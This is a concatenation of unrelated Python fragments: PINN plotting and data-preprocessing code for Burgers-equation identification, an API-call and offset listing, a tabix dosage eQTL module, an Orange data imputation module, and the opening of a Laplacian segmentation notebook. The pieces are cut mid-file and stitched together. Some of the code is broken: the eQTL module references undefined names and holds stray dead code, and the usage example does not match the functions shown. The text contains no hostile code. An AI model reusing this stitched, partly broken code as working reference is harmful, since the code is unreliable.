ax.set_xlim([lb-0.1, ub+0.1])
ax.legend(loc='upper center', bbox_to_anchor=(0.8, -0.3), ncol=2, frameon=False)
ax = plt.subplot(gs1[0, 1])
ax.plot(x,u_exact[idx_t1,:], 'b-', linewidth = 2, label = 'Exact')
ax.plot(test_X, u1_pred[:,-1], 'r--', linewidth = 2, label = 'Prediction')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
ax.set_title('$t = %.2f$' % (t[idx_t1]), fontsize = 10)
ax.set_xlim([lb-0.1, ub+0.1])
ax.legend(loc='upper center', bbox_to_anchor=(0.1, -0.3), ncol=2, frameon=False)
plt.show()
# Identification
def preprocess_data_discrete_identification(file, idx_t0, idx_t1, N0 = 250, N1 = 250, noise = 0.0):
x, t, u_exact = load_dataset(file)
# Compute domain bounds for x
lb = x.min(0)
ub = x.max(0)
# Determine dt
dt = t[idx_t1] - t[idx_t0]
# Determine q
q = int(np.ceil(0.5*np.log(np.finfo(float).eps)/np.log(dt)))
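    # The choice above targets a temporal error of order dt**(2q) at machine precision:
    # solving dt**(2q) ~ eps gives q = 0.5 * log(eps) / log(dt). For example, with
    # dt = 0.1 and eps ~ 2.2e-16 this yields q = ceil(7.83) = 8 IRK stages.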
# Sampling for initial step
idx_x = np.random.choice(x.shape[0], N0, replace = False)
x0 = x[idx_x,:]
u0 = u_exact[idx_t0:idx_t0+1, idx_x].T
u0 = u0 + noise*np.std(u0)*np.random.randn(u0.shape[0], u0.shape[1])
# Sampling for final step
idx_x = np.random.choice(x.shape[0], N1, replace = False)
x1 = x[idx_x,:]
u1 = u_exact[idx_t1:idx_t1+1, idx_x].T
u1 = u1 + noise*np.std(u1)*np.random.randn(u1.shape[0], u1.shape[1])
tmp = np.float32(np.loadtxt(f'IRK_weights/Butcher_IRK{q}.txt', ndmin = 2))
IRK_weights = np.reshape(tmp[:q**2+q], (q+1,q))
IRK_alphas = IRK_weights[:-1,:]
IRK_betas = IRK_weights[-1:,:]
return x, t, u_exact, lb, ub, dt, q, x0, u0, x1, u1, IRK_alphas, IRK_betas
def plot_results_discrete_identification(x, t, x0, x1, u_exact, u0, u1, idx_t0, idx_t1, lb, ub, lambda_1, lambda_2):
fig = plt.figure(figsize = (10, 9.5))
ax = plt.gca()
ax.axis('off')
fig.patch.set_facecolor('white')
gs0 = gridspec.GridSpec(1, 2)
gs0.update(top=1-0.06, bottom=1-1/3+0.05, left=0.15, right=0.85, wspace=0)
ax = plt.subplot(gs0[:, :])
h = ax.imshow(u_exact.T, interpolation='nearest', cmap='rainbow',
extent=[t.min(),t.max(), lb[0], ub[0]],
origin='lower', aspect='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
line = np.linspace(x.min(), x.max(), 2)[:,None]
ax.plot(t[idx_t0]*np.ones((2,1)), line, 'w-', linewidth = 1.0)
ax.plot(t[idx_t1]*np.ones((2,1)), line, 'w-', linewidth = 1.0)
ax.set_xlabel('$t$')
ax.set_ylabel('$x$')
ax.set_title('$u(t,x)$', fontsize = 10)
gs1 = gridspec.GridSpec(1, 2)
gs1.update(top=1-1/3-0.1, bottom=1-2/3, left=0.15, right=0.85, wspace=0.5)
ax = plt.subplot(gs1[0, 0])
ax.plot(x, u_exact[idx_t0,:][:,None], 'b', linewidth = 2, label = 'Exact')
ax.plot(x0, u0, 'rx', linewidth = 2, label = 'Data')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
    ax.set_title('$t = %.2f$\n%d training data' % (t[idx_t0], u0.shape[0]), fontsize = 10)
ax = plt.subplot(gs1[0, 1])
ax.plot(x, u_exact[idx_t1,:][:,None], 'b', linewidth = 2, label = 'Exact')
ax.plot(x1, u1, 'rx', linewidth = 2, label = 'Data')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
    ax.set_title('$t = %.2f$\n%d training data' % (t[idx_t1], u1.shape[0]), fontsize = 10)
ax.legend(loc='upper center', bbox_to_anchor=(-0.3, -0.3), ncol=2, frameon=False)
gs2 = gridspec.GridSpec(1, 2)
gs2.update(top=1-2/3-0.05, bottom=0, left=0.15, right=0.85, wspace=0.0)
ax = plt.subplot(gs2[0, 0])
ax.axis('off')
    ax.text(0.5,0.5,f'Correct PDE: $u_t + u u_x - 0.0031831 u_{{xx}} = 0$ \n$\\lambda_1$: {lambda_1:.5f} \t\t $\\lambda_2$: {lambda_2:.5f}')
plt.show()
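# Minimal usage sketch, assuming a Burgers-type dataset stored as 'burgers_shock.mat'
# with fields 'x', 't' and 'usol', and the IRK weight files available under
# 'IRK_weights/' (the file name and time indices are example values):
if __name__ == "__main__":
    (x, t, u_exact, T, lb, ub, dt, x0, u0, x1,
     test_X, test_u, IRK_weights) = preprocess_data_discrete_inference(
        'burgers_shock.mat', idx_t0=10, idx_t1=90, q=500, N=250, noise=0.0)
    print(f'dt = {dt}, IRK weights shape = {IRK_weights.shape}')  # shape is (q + 1, q)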
|
[
"numpy.reshape",
"numpy.ones",
"numpy.random.choice",
"matplotlib.pyplot.gca",
"scipy.io.loadmat",
"numpy.log",
"matplotlib.pyplot.figure",
"matplotlib.gridspec.GridSpec",
"numpy.random.randn",
"numpy.vstack",
"mpl_toolkits.axes_grid1.make_axes_locatable",
"numpy.std",
"numpy.finfo",
"numpy.meshgrid",
"numpy.loadtxt",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.show"
] |
[((311, 327), 'scipy.io.loadmat', 'io.loadmat', (['file'], {}), '(file)\n', (321, 327), True, 'import scipy.io as io\n'), ((533, 550), 'numpy.meshgrid', 'np.meshgrid', (['x', 't'], {}), '(x, t)\n', (544, 550), True, 'import numpy as np\n'), ((787, 833), 'numpy.random.choice', 'np.random.choice', (['x.shape[0]', 'N'], {'replace': '(False)'}), '(x.shape[0], N, replace=False)\n', (803, 833), True, 'import numpy as np\n'), ((982, 1001), 'numpy.vstack', 'np.vstack', (['[lb, ub]'], {}), '([lb, ub])\n', (991, 1001), True, 'import numpy as np\n'), ((1104, 1144), 'numpy.reshape', 'np.reshape', (['tmp[:q ** 2 + q]', '(q + 1, q)'], {}), '(tmp[:q ** 2 + q], (q + 1, q))\n', (1114, 1144), True, 'import numpy as np\n'), ((1331, 1360), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 9.5)'}), '(figsize=(10, 9.5))\n', (1341, 1360), True, 'import matplotlib.pyplot as plt\n'), ((1372, 1381), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1379, 1381), True, 'import matplotlib.pyplot as plt\n'), ((1498, 1521), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {}), '(1, 2)\n', (1515, 1521), True, 'import matplotlib.gridspec as gridspec\n'), ((1611, 1633), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs0[:, :]'], {}), '(gs0[:, :])\n', (1622, 1633), True, 'import matplotlib.pyplot as plt\n'), ((1847, 1870), 'mpl_toolkits.axes_grid1.make_axes_locatable', 'make_axes_locatable', (['ax'], {}), '(ax)\n', (1866, 1870), False, 'from mpl_toolkits.axes_grid1 import make_axes_locatable\n'), ((2331, 2354), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {}), '(1, 2)\n', (2348, 2354), True, 'import matplotlib.gridspec as gridspec\n'), ((2448, 2470), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs1[0, 0]'], {}), '(gs1[0, 0])\n', (2459, 2470), True, 'import matplotlib.pyplot as plt\n'), ((2837, 2859), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs1[0, 1]'], {}), '(gs1[0, 1])\n', (2848, 2859), True, 'import matplotlib.pyplot as plt\n'), ((3268, 3278), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3276, 3278), True, 'import matplotlib.pyplot as plt\n'), ((3713, 3760), 'numpy.random.choice', 'np.random.choice', (['x.shape[0]', 'N0'], {'replace': '(False)'}), '(x.shape[0], N0, replace=False)\n', (3729, 3760), True, 'import numpy as np\n'), ((3946, 3993), 'numpy.random.choice', 'np.random.choice', (['x.shape[0]', 'N1'], {'replace': '(False)'}), '(x.shape[0], N1, replace=False)\n', (3962, 3993), True, 'import numpy as np\n'), ((4234, 4274), 'numpy.reshape', 'np.reshape', (['tmp[:q ** 2 + q]', '(q + 1, q)'], {}), '(tmp[:q ** 2 + q], (q + 1, q))\n', (4244, 4274), True, 'import numpy as np\n'), ((4552, 4581), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 9.5)'}), '(figsize=(10, 9.5))\n', (4562, 4581), True, 'import matplotlib.pyplot as plt\n'), ((4593, 4602), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4600, 4602), True, 'import matplotlib.pyplot as plt\n'), ((4674, 4697), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {}), '(1, 2)\n', (4691, 4697), True, 'import matplotlib.gridspec as gridspec\n'), ((4786, 4808), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs0[:, :]'], {}), '(gs0[:, :])\n', (4797, 4808), True, 'import matplotlib.pyplot as plt\n'), ((5009, 5032), 'mpl_toolkits.axes_grid1.make_axes_locatable', 'make_axes_locatable', (['ax'], {}), '(ax)\n', (5028, 5032), False, 'from mpl_toolkits.axes_grid1 import make_axes_locatable\n'), ((5426, 5449), 'matplotlib.gridspec.GridSpec', 
'gridspec.GridSpec', (['(1)', '(2)'], {}), '(1, 2)\n', (5443, 5449), True, 'import matplotlib.gridspec as gridspec\n'), ((5539, 5561), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs1[0, 0]'], {}), '(gs1[0, 0])\n', (5550, 5561), True, 'import matplotlib.pyplot as plt\n'), ((5857, 5879), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs1[0, 1]'], {}), '(gs1[0, 1])\n', (5868, 5879), True, 'import matplotlib.pyplot as plt\n'), ((6262, 6285), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {}), '(1, 2)\n', (6279, 6285), True, 'import matplotlib.gridspec as gridspec\n'), ((6376, 6398), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs2[0, 0]'], {}), '(gs2[0, 0])\n', (6387, 6398), True, 'import matplotlib.pyplot as plt\n'), ((6561, 6571), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6569, 6571), True, 'import matplotlib.pyplot as plt\n'), ((1028, 1082), 'numpy.loadtxt', 'np.loadtxt', (['f"""IRK_weights/Butcher_IRK{q}.txt"""'], {'ndmin': '(2)'}), "(f'IRK_weights/Butcher_IRK{q}.txt', ndmin=2)\n", (1038, 1082), True, 'import numpy as np\n'), ((4158, 4212), 'numpy.loadtxt', 'np.loadtxt', (['f"""IRK_weights/Butcher_IRK{q}.txt"""'], {'ndmin': '(2)'}), "(f'IRK_weights/Butcher_IRK{q}.txt', ndmin=2)\n", (4168, 4212), True, 'import numpy as np\n'), ((930, 971), 'numpy.random.randn', 'np.random.randn', (['u0.shape[0]', 'u0.shape[1]'], {}), '(u0.shape[0], u0.shape[1])\n', (945, 971), True, 'import numpy as np\n'), ((2043, 2058), 'numpy.ones', 'np.ones', (['(2, 1)'], {}), '((2, 1))\n', (2050, 2058), True, 'import numpy as np\n'), ((2108, 2123), 'numpy.ones', 'np.ones', (['(2, 1)'], {}), '((2, 1))\n', (2115, 2123), True, 'import numpy as np\n'), ((3857, 3898), 'numpy.random.randn', 'np.random.randn', (['u0.shape[0]', 'u0.shape[1]'], {}), '(u0.shape[0], u0.shape[1])\n', (3872, 3898), True, 'import numpy as np\n'), ((4090, 4131), 'numpy.random.randn', 'np.random.randn', (['u1.shape[0]', 'u1.shape[1]'], {}), '(u1.shape[0], u1.shape[1])\n', (4105, 4131), True, 'import numpy as np\n'), ((5201, 5216), 'numpy.ones', 'np.ones', (['(2, 1)'], {}), '((2, 1))\n', (5208, 5216), True, 'import numpy as np\n'), ((5268, 5283), 'numpy.ones', 'np.ones', (['(2, 1)'], {}), '((2, 1))\n', (5275, 5283), True, 'import numpy as np\n'), ((919, 929), 'numpy.std', 'np.std', (['u0'], {}), '(u0)\n', (925, 929), True, 'import numpy as np\n'), ((3651, 3661), 'numpy.log', 'np.log', (['dt'], {}), '(dt)\n', (3657, 3661), True, 'import numpy as np\n'), ((3846, 3856), 'numpy.std', 'np.std', (['u0'], {}), '(u0)\n', (3852, 3856), True, 'import numpy as np\n'), ((4079, 4089), 'numpy.std', 'np.std', (['u1'], {}), '(u1)\n', (4085, 4089), True, 'import numpy as np\n'), ((3630, 3645), 'numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (3638, 3645), True, 'import numpy as np\n')]
|
""" Functions for working with tabix dosages in pandas dataframes
"""
import gzip
import numpy as np
import pandas as pd
import pysam
import statsmodels.api as sm
class Dosage(object):
def __init__(self, dosages, annotations, gene_name):
# Match up the annotation dataframe with the dosage dataframe
mindex = np.intersect1d(np.asarray(dosages.index, dtype=str),
np.asarray(annotations.index, dtype=str))
self.annot = annotations.loc[mindex, :]
        ordering = self.annot.loc[:, 'pos'].argsort()
self.annot = self.annot.iloc[ordering, :]
        self.dosages = dosages.loc[mindex, :]
self.dosages = self.dosages.iloc[ordering, :]
self.gene_name = gene_name
def run_eQTL(self, count_matrix, covariates, extra_snps=None):
#self.pvalues = self.dosages.apply()
        pvalues = self.dosages.apply(eQTL_func, axis=1, args=(covariates,
            count_matrix.loc[self.gene_name, :]))
self.pvalues = pvalues
def get_dosages_by_range(chrm, start, end, gene_name, annotation_file,
dosage_df, mapping=None):
"""
Fuzzy mapping between annotation and genotypes
Returns Dosage instance.
"""
ann_file = pysam.Tabixfile(annotation_file)
ann_v = ann_file.fetch(chrm, start, end)
rsIDs = []
pos = []
ref = []
alt = []
for i in ann_v:
i = i.split("\t")
rsIDs.append(i[3])
pos.append(int(i[1]))
ref.append(i[6])
alt.append(i[7])
annot = pd.DataFrame({'pos': pos, 'ref': ref, 'alt': alt}, index=pd.Index(rsIDs))
comb_iter = []
for dos in dosage_df:
mindex = np.intersect1d(np.asarray(dos.index, dtype=str),
np.asarray(annot.index, dtype=str))
if len(mindex) > 0:
            comb_iter.append(dos.loc[mindex, :])
else:
pass
out_dos = pd.concat(comb_iter)
'''
dosages = pd.read_csv(dosage_path + path, sep=" ", header=None,
index_col = 0, skiprows=roughly_first,
nrows=roughly_end-roughly_first, names=col_names.columns)
'''
print(annot.shape, out_dos.shape, gene_name)
return Dosage(out_dos, annot, gene_name)
def generate_dosage_mapping(dosage_file, mapping_file = None, interval=50):
"""
Returns dictionary of rsIDs: fileposition from a dosage file
"""
    if not mapping_file:
        with open(dosage_file) as fh:
            next(fh)  # skip the header line
            f_i = {}
            for i, j in enumerate(fh):
                if i % interval == 0:
                    f_i[j.split(" ")[0]] = i - 1
            return(f_i)
def eQTL_func(snps, cov, expression):
"""
"""
cov = cov.T
cov['snps'] = snps
cov = sm.add_constant(cov)
model = sm.OLS(expression, cov)
return(model.fit().pvalues['snps'])
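# Illustrative sketch, not part of the original module: a minimal call of eQTL_func
# on toy pandas objects shaped like the real inputs (snps: Series of dosages per
# sample, cov: DataFrame of covariates with samples as columns, expression: Series
# of expression values). Wrapped in a function so nothing runs at import time.
def _demo_eQTL_func():
    snps = pd.Series([0.0, 1.0, 2.0, 1.0, 0.0, 2.0])
    cov = pd.DataFrame({'age': [30, 40, 50, 35, 45, 55]}).T
    expression = pd.Series([1.1, 2.0, 3.2, 1.9, 1.0, 3.1])
    # returns the OLS p-value of the SNP term
    return eQTL_func(snps, cov, expression)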
class eQTL(object):
""" Python class for completing eQTLs. Does lazy loading of all large
files.
"""
def __init__(self, dosages_path, expression, vannotation):
self.dosage = dosages_path
self.expression = expression
        self.vannotations = vannotation
    def generate_mapping(self):
        pass
"""
if mapping:
for i in ann_v:
rsID = i.split("\t")[3]
try:
roughly_first = mapping[rsID]
rsIDs.append(rsID)
pos.append(int(i.split("\t")[1]))
break
except KeyError:
pass
for i in ann_v:
i = i.split("\t")
try:
roughly_end = mapping[i[3]]
except KeyError:
pass
pos.append(int(i[1]))
rsIDs.append(i[3])
"""
def get_annotation(annotation, chrm):
ann_file = pysam.Tabixfile(annotation)
ann_v = ann_file.fetch(chrm)
rsIDs = []
pos = []
ref = []
alt = []
for i in ann_v:
i = i.split("\t")
rsIDs.append(i[3])
pos.append(int(i[1]))
ref.append(i[6])
alt.append(i[7])
annot = pd.DataFrame({'pos': pos, 'ref': ref, 'alt': alt}, index=pd.Index(rsIDs))
return(annot)
|
[
"numpy.asarray",
"pysam.Tabixfile",
"pandas.Index",
"statsmodels.api.add_constant",
"statsmodels.api.OLS",
"pandas.concat"
] |
[((1215, 1247), 'pysam.Tabixfile', 'pysam.Tabixfile', (['annotation_file'], {}), '(annotation_file)\n', (1230, 1247), False, 'import pysam\n'), ((1870, 1890), 'pandas.concat', 'pd.concat', (['comb_iter'], {}), '(comb_iter)\n', (1879, 1890), True, 'import pandas as pd\n'), ((2765, 2785), 'statsmodels.api.add_constant', 'sm.add_constant', (['cov'], {}), '(cov)\n', (2780, 2785), True, 'import statsmodels.api as sm\n'), ((2798, 2821), 'statsmodels.api.OLS', 'sm.OLS', (['expression', 'cov'], {}), '(expression, cov)\n', (2804, 2821), True, 'import statsmodels.api as sm\n'), ((3788, 3815), 'pysam.Tabixfile', 'pysam.Tabixfile', (['annotation'], {}), '(annotation)\n', (3803, 3815), False, 'import pysam\n'), ((346, 382), 'numpy.asarray', 'np.asarray', (['dosages.index'], {'dtype': 'str'}), '(dosages.index, dtype=str)\n', (356, 382), True, 'import numpy as np\n'), ((401, 441), 'numpy.asarray', 'np.asarray', (['annotations.index'], {'dtype': 'str'}), '(annotations.index, dtype=str)\n', (411, 441), True, 'import numpy as np\n'), ((1569, 1584), 'pandas.Index', 'pd.Index', (['rsIDs'], {}), '(rsIDs)\n', (1577, 1584), True, 'import pandas as pd\n'), ((1663, 1695), 'numpy.asarray', 'np.asarray', (['dos.index'], {'dtype': 'str'}), '(dos.index, dtype=str)\n', (1673, 1695), True, 'import numpy as np\n'), ((1713, 1747), 'numpy.asarray', 'np.asarray', (['annot.index'], {'dtype': 'str'}), '(annot.index, dtype=str)\n', (1723, 1747), True, 'import numpy as np\n'), ((4125, 4140), 'pandas.Index', 'pd.Index', (['rsIDs'], {}), '(rsIDs)\n', (4133, 4140), True, 'import pandas as pd\n')]
|
import numpy as np
import scipy.sparse as sp
import Orange.data
from Orange.statistics import distribution, basic_stats
from Orange.util import Reprable
from .transformation import Transformation, Lookup
__all__ = [
"ReplaceUnknowns",
"Average",
"DoNotImpute",
"DropInstances",
"Model",
"AsValue",
"Random",
"Default",
]
class ReplaceUnknowns(Transformation):
"""
A column transformation which replaces unknown values with a fixed `value`.
Parameters
----------
variable : Orange.data.Variable
The target variable for imputation.
value : int or float
The value with which to replace the unknown values
"""
def __init__(self, variable, value=0):
super().__init__(variable)
self.value = value
def transform(self, c):
if sp.issparse(c):
c.data = np.where(np.isnan(c.data), self.value, c.data)
return c
else:
return np.where(np.isnan(c), self.value, c)
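# Illustrative sketch, not part of the original module: ReplaceUnknowns.transform
# only relies on `self.value`, so it can be checked on a plain numpy column. Passing
# None as the variable is an assumption of this demo, not how the class is wired
# into Orange preprocessing pipelines.
def _demo_replace_unknowns():
    column = np.array([1.0, np.nan, 3.0])
    return ReplaceUnknowns(None, value=-1.0).transform(column)  # -> [1., -1., 3.]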
class BaseImputeMethod(Reprable):
name = ""
short_name = ""
description = ""
format = "{var.name} -> {self.short_name}"
columns_only = False
def __call__(self, data, variable):
""" Imputes table along variable column.
Args:
data (Table): A table to impute.
variable (Variable): Variable for completing missing values.
Returns:
A new Variable instance with completed missing values or
            an array mask of rows to drop out.
"""
raise NotImplementedError
def format_variable(self, var):
return self.format.format(var=var, self=self)
def __str__(self):
return self.name
def copy(self):
return self
@classmethod
def supports_variable(cls, variable):
return True
class DoNotImpute(BaseImputeMethod):
name = "Don't impute"
short_name = "leave"
description = ""
def __call__(self, data, variable):
return variable
class DropInstances(BaseImputeMethod):
name = "Remove instances with unknown values"
short_name = "drop"
description = ""
def __call__(self, data, variable):
col, _ = data.get_column_view(variable)
return np.isnan(col)
class Average(BaseImputeMethod):
name = "Average/Most frequent"
short_name = "average"
description = "Replace with average/mode of the column"
def __call__(self, data, variable, value=None):
variable = data.domain[variable]
if value is None:
if variable.is_continuous:
stats = basic_stats.BasicStats(data, variable)
value = stats.mean
elif variable.is_discrete:
dist = distribution.get_distribution(data, variable)
value = dist.modus()
else:
raise TypeError("Variable must be continuous or discrete")
a = variable.copy(compute_value=ReplaceUnknowns(variable, value))
a.to_sql = ImputeSql(variable, value)
return a
class ImputeSql(Reprable):
def __init__(self, var, default):
self.var = var
self.default = default
def __call__(self):
return "coalesce(%s, %s)" % (self.var.to_sql(), str(self.default))
class Default(BaseImputeMethod):
name = "Value"
short_name = "value"
description = ""
columns_only = True
format = "{var} -> {self.default}"
def __init__(self, default=0):
self.default = default
def __call__(self, data, variable, *, default=None):
variable = data.domain[variable]
default = default if default is not None else self.default
return variable.copy(compute_value=ReplaceUnknowns(variable, default))
def copy(self):
return Default(self.default)
class ReplaceUnknownsModel(Reprable):
"""
Replace unknown values with predicted values using a `Orange.base.Model`
Parameters
----------
variable : Orange.data.Variable
The target variable for the imputation.
model : Orange.base.Model
A fitted model predicting `variable`.
"""
def __init__(self, variable, model):
assert model.domain.class_var == variable
self.variable = variable
self.model = model
def __call__(self, data):
if isinstance(data, Orange.data.Instance):
column = np.array([float(data[self.variable])])
else:
column = np.array(data.get_column_view(self.variable)[0], copy=True)
mask = np.isnan(column)
if not np.any(mask):
return column
if isinstance(data, Orange.data.Instance):
predicted = self.model(data)
else:
predicted = self.model(data[mask])
column[mask] = predicted
return column
class Model(BaseImputeMethod):
_name = "Model-based imputer"
short_name = "model"
description = ""
format = BaseImputeMethod.format + " ({self.learner.name})"
@property
def name(self):
return "{} ({})".format(self._name, getattr(self.learner, "name", ""))
def __init__(self, learner):
self.learner = learner
def __call__(self, data, variable):
variable = data.domain[variable]
domain = domain_with_class_var(data.domain, variable)
if self.learner.check_learner_adequacy(domain):
data = data.transform(domain)
model = self.learner(data)
assert model.domain.class_var == variable
return variable.copy(compute_value=ReplaceUnknownsModel(variable, model))
else:
raise ValueError(
"`{}` doesn't support domain type".format(self.learner.name)
)
def copy(self):
return Model(self.learner)
def supports_variable(self, variable):
domain = Orange.data.Domain([], class_vars=variable)
return self.learner.check_learner_adequacy(domain)
def domain_with_class_var(domain, class_var):
"""
Return a domain with class_var as output domain.class_var.
If class_var is in the input domain's attributes it is removed from the
output's domain.attributes.
"""
if domain.class_var is class_var:
return domain
elif class_var in domain.attributes:
attrs = [var for var in domain.attributes if var is not class_var]
else:
attrs = domain.attributes
return Orange.data.Domain(attrs, class_var)
class IsDefined(Transformation):
def transform(self, c):
if sp.issparse(c):
c = c.toarray()
return ~np.isnan(c)
class AsValue(BaseImputeMethod):
name = "As a distinct value"
short_name = "new value"
description = ""
def __call__(self, data, variable):
variable = data.domain[variable]
if variable.is_discrete:
fmt = "{var.name}"
value = "N/A"
var = Orange.data.DiscreteVariable(
fmt.format(var=variable),
values=variable.values + [value],
base_value=variable.base_value,
compute_value=Lookup(
variable,
np.arange(len(variable.values), dtype=int),
unknown=len(variable.values),
),
sparse=variable.sparse,
)
return var
elif variable.is_continuous:
fmt = "{var.name}_def"
indicator_var = Orange.data.DiscreteVariable(
fmt.format(var=variable),
values=("undef", "def"),
compute_value=IsDefined(variable),
sparse=variable.sparse,
)
stats = basic_stats.BasicStats(data, variable)
return (
variable.copy(compute_value=ReplaceUnknowns(variable, stats.mean)),
indicator_var,
)
else:
raise TypeError(type(variable))
class ReplaceUnknownsRandom(Transformation):
"""
A column transformation replacing unknowns with values drawn randomly from
an empirical distribution.
Parameters
----------
variable : Orange.data.Variable
The target variable for imputation.
distribution : Orange.statistics.distribution.Distribution
The corresponding sampling distribution
"""
def __init__(self, variable, distribution):
assert distribution.size > 0
assert distribution.variable == variable
super().__init__(variable)
self.distribution = distribution
if variable.is_discrete:
counts = np.array(distribution)
elif variable.is_continuous:
counts = np.array(distribution)[1, :]
else:
raise TypeError("Only discrete and continuous " "variables are supported")
csum = np.sum(counts)
if csum > 0:
self.sample_prob = counts / csum
else:
self.sample_prob = np.ones_like(counts) / len(counts)
def transform(self, c):
if not sp.issparse(c):
c = np.array(c, copy=True)
else:
c = c.toarray().ravel()
nanindices = np.flatnonzero(np.isnan(c))
if self.variable.is_discrete:
sample = np.random.choice(
len(self.variable.values),
size=len(nanindices),
replace=True,
p=self.sample_prob,
)
else:
sample = np.random.choice(
np.asarray(self.distribution)[0, :],
size=len(nanindices),
replace=True,
p=self.sample_prob,
)
c[nanindices] = sample
return c
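# Illustrative sketch, not part of the original module: the idea behind
# ReplaceUnknownsRandom written with plain numpy -- missing entries are filled by
# sampling from the empirical distribution of the observed values. The real class
# additionally handles Orange distribution objects and sparse columns.
def _demo_empirical_fill(column, rng=np.random):
    column = np.array(column, dtype=float, copy=True)
    mask = np.isnan(column)
    observed = column[~mask]
    if observed.size and mask.any():
        column[mask] = rng.choice(observed, size=mask.sum(), replace=True)
    return column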
class Random(BaseImputeMethod):
name = "Random values"
short_name = "random"
description = "Replace with a random value"
def __call__(self, data, variable):
variable = data.domain[variable]
dist = distribution.get_distribution(data, variable)
# A distribution is invalid if a continuous variable's column does not
# contain any known values or if a discrete variable's .values == []
isinvalid = dist.size == 0
if isinvalid and variable.is_discrete:
assert len(variable.values) == 0
raise ValueError("'{}' has no values".format(variable))
elif isinvalid and variable.is_continuous:
raise ValueError("'{}' has an unknown distribution".format(variable))
if variable.is_discrete and np.sum(dist) == 0:
dist += 1 / len(dist)
elif variable.is_continuous and np.sum(dist[1, :]) == 0:
dist[1, :] += 1 / dist.shape[1]
return variable.copy(compute_value=ReplaceUnknownsRandom(variable, dist))
|
[
"Orange.statistics.distribution.get_distribution",
"numpy.ones_like",
"Orange.statistics.basic_stats.BasicStats",
"numpy.asarray",
"numpy.any",
"scipy.sparse.issparse",
"numpy.sum",
"numpy.array",
"numpy.isnan"
] |
[((833, 847), 'scipy.sparse.issparse', 'sp.issparse', (['c'], {}), '(c)\n', (844, 847), True, 'import scipy.sparse as sp\n'), ((2250, 2263), 'numpy.isnan', 'np.isnan', (['col'], {}), '(col)\n', (2258, 2263), True, 'import numpy as np\n'), ((4537, 4553), 'numpy.isnan', 'np.isnan', (['column'], {}), '(column)\n', (4545, 4553), True, 'import numpy as np\n'), ((6529, 6543), 'scipy.sparse.issparse', 'sp.issparse', (['c'], {}), '(c)\n', (6540, 6543), True, 'import scipy.sparse as sp\n'), ((8830, 8844), 'numpy.sum', 'np.sum', (['counts'], {}), '(counts)\n', (8836, 8844), True, 'import numpy as np\n'), ((9933, 9978), 'Orange.statistics.distribution.get_distribution', 'distribution.get_distribution', (['data', 'variable'], {}), '(data, variable)\n', (9962, 9978), False, 'from Orange.statistics import distribution, basic_stats\n'), ((4569, 4581), 'numpy.any', 'np.any', (['mask'], {}), '(mask)\n', (4575, 4581), True, 'import numpy as np\n'), ((6589, 6600), 'numpy.isnan', 'np.isnan', (['c'], {}), '(c)\n', (6597, 6600), True, 'import numpy as np\n'), ((8604, 8626), 'numpy.array', 'np.array', (['distribution'], {}), '(distribution)\n', (8612, 8626), True, 'import numpy as np\n'), ((9035, 9049), 'scipy.sparse.issparse', 'sp.issparse', (['c'], {}), '(c)\n', (9046, 9049), True, 'import scipy.sparse as sp\n'), ((9067, 9089), 'numpy.array', 'np.array', (['c'], {'copy': '(True)'}), '(c, copy=True)\n', (9075, 9089), True, 'import numpy as np\n'), ((9176, 9187), 'numpy.isnan', 'np.isnan', (['c'], {}), '(c)\n', (9184, 9187), True, 'import numpy as np\n'), ((879, 895), 'numpy.isnan', 'np.isnan', (['c.data'], {}), '(c.data)\n', (887, 895), True, 'import numpy as np\n'), ((980, 991), 'numpy.isnan', 'np.isnan', (['c'], {}), '(c)\n', (988, 991), True, 'import numpy as np\n'), ((2604, 2642), 'Orange.statistics.basic_stats.BasicStats', 'basic_stats.BasicStats', (['data', 'variable'], {}), '(data, variable)\n', (2626, 2642), False, 'from Orange.statistics import distribution, basic_stats\n'), ((7696, 7734), 'Orange.statistics.basic_stats.BasicStats', 'basic_stats.BasicStats', (['data', 'variable'], {}), '(data, variable)\n', (7718, 7734), False, 'from Orange.statistics import distribution, basic_stats\n'), ((8956, 8976), 'numpy.ones_like', 'np.ones_like', (['counts'], {}), '(counts)\n', (8968, 8976), True, 'import numpy as np\n'), ((10500, 10512), 'numpy.sum', 'np.sum', (['dist'], {}), '(dist)\n', (10506, 10512), True, 'import numpy as np\n'), ((2740, 2785), 'Orange.statistics.distribution.get_distribution', 'distribution.get_distribution', (['data', 'variable'], {}), '(data, variable)\n', (2769, 2785), False, 'from Orange.statistics import distribution, basic_stats\n'), ((8685, 8707), 'numpy.array', 'np.array', (['distribution'], {}), '(distribution)\n', (8693, 8707), True, 'import numpy as np\n'), ((9497, 9526), 'numpy.asarray', 'np.asarray', (['self.distribution'], {}), '(self.distribution)\n', (9507, 9526), True, 'import numpy as np\n'), ((10593, 10611), 'numpy.sum', 'np.sum', (['dist[1, :]'], {}), '(dist[1, :])\n', (10599, 10611), True, 'import numpy as np\n')]
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
======================
Laplacian segmentation
======================
This notebook implements the laplacian segmentation method of
`McFee and Ellis, 2014 <http://bmcfee.github.io/papers/ismir2014_spectral.pdf>`_,
with a couple of minor stability improvements.
